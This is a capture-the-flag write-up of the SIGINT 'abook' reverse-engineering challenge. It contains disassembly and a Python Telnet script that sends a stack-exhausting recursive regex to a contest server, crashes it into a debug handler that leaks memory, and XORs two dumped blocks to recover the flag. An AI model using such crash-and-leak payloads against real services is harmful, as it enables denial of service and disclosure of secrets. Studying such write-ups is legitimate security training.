''' abook - (re200) SIGINT We are given ELF x64 binary that act as a contactt book but before main functionality it reads 32 bytes from /dev/urandom, copies it to another buffor then xor last buffor with admin-flag given as a parametr .text:0000000000400C56 loc_400C56: ; CODE XREF: main+28j .text:0000000000400C56 mov esi, offset modes ; "r" .text:0000000000400C5B mov edi, offset filename ; "/dev/urandom" .text:0000000000400C60 call _fopen .text:0000000000400C65 mov esi, 1 ; size .text:0000000000400C6A mov rcx, rax ; stream .text:0000000000400C6D mov rbp, rax .text:0000000000400C70 mov edx, 20h ; n .text:0000000000400C75 mov edi, offset xor_key ; ptr .text:0000000000400C7A call _fread .text:0000000000400C7F mov rdi, rbp ; stream .text:0000000000400C82 call _fclose .text:0000000000400C87 mov eax, offset secret_key .text:0000000000400C8C mov esi, offset xor_key .text:0000000000400C91 mov ecx, 8 .text:0000000000400C96 mov rdi, rax .text:0000000000400C99 xor eax, eax .text:0000000000400C9B rep movsd .text:0000000000400C9D .text:0000000000400C9D loc_400C9D: ; CODE XREF: main+A7j .text:0000000000400C9D mov rdx, [rbx+8] ; argv[1] .text:0000000000400CA1 movzx edx, byte ptr [rdx+rax] .text:0000000000400CA5 test dl, dl .text:0000000000400CA7 jz short loc_400CB9 .text:0000000000400CA9 xor ds:secret_key[rax], dl .text:0000000000400CAF add rax, 1 .text:0000000000400CB3 cmp rax, 20h .text:0000000000400CB7 jnz short loc_400C9D ; Also it sets custom stack for signals and intercepts SIGSEGV,SIGABRT,SIGBUS what is imported the stack begins before xor_key and secret_key .text:0000000000400CB9 set_signals: ; CODE XREF: main+97j .text:0000000000400CB9 movzx eax, cs:xor_end .text:0000000000400CC0 xor esi, esi ; oss .text:0000000000400CC2 mov rdi, rsp ; ss .text:0000000000400CC5 mov [rsp+1148h+var_1148], offset stack_base .text:0000000000400CCD mov [rsp+1148h+var_1138], 2000h .text:0000000000400CD6 mov ebx, offset comands .text:0000000000400CDB mov [rsp+1148h+var_1140], 0 .text:0000000000400CE3 mov cs:sc_end, al .text:0000000000400CE9 call _sigaltstack .text:0000000000400CEE lea rdi, [rsp+1148h+set] ; set .text:0000000000400CF3 mov [rsp+1148h+act], offset debug .text:0000000000400CFC mov [rsp+1148h+var_1050], 8000004h .text:0000000000400D07 call _sigfillset .text:0000000000400D0C lea rsi, [rsp+1148h+act] ; act .text:0000000000400D11 xor edx, edx ; oact .text:0000000000400D13 mov edi, SIGSEGV ; sig .text:0000000000400D18 call _sigaction .text:0000000000400D1D lea rsi, [rsp+1148h+act] ; act .text:0000000000400D22 xor edx, edx ; oact .text:0000000000400D24 mov edi, SIGABRT ; sig .text:0000000000400D29 call _sigaction .text:0000000000400D2E lea rsi, [rsp+1148h+act] ; act .text:0000000000400D33 xor edx, edx ; oact .text:0000000000400D35 mov edi, SIGBUS ; sig .text:0000000000400D3A call _sigaction debug routine dumps stack frames and registers, and first stack frame is pointing exacly at secret_key So what we have to do is to crach the application ;] diggin throu code we can find that search command accepts regexp and fire it to find corresponding records - we can use it! We can prepare nasty recusive regex like this: .*{10,}{10,}{10,}{10,}{10,} since implemntation of regcomp is recursive it will fire up iteself so many times it eventual exhaust the stack trigering SIGSEGV and we lend in our costom signal handler all we need to do i read first frame xor two blocks together and enjoy the flag flag: SIGINT_DO_NOT_CRASH_ME_PLEASE!! -- mak ''' from telnetlib import Telnet t = Telnet('188.40.147.114',1024) t.write('search .*{10,}{10,}{10,}{10,}{10,}'+"\n") x= t.read_all() data = ''.join(filter(lambda x: ' ' in x,x.splitlines())).replace("\n",'').replace(' ','').decode('hex') secret = data[:32] xkey = data[32:64] print ''.join([ chr(ord(x[1])^ord(x[0])) for x in zip(secret,xkey)])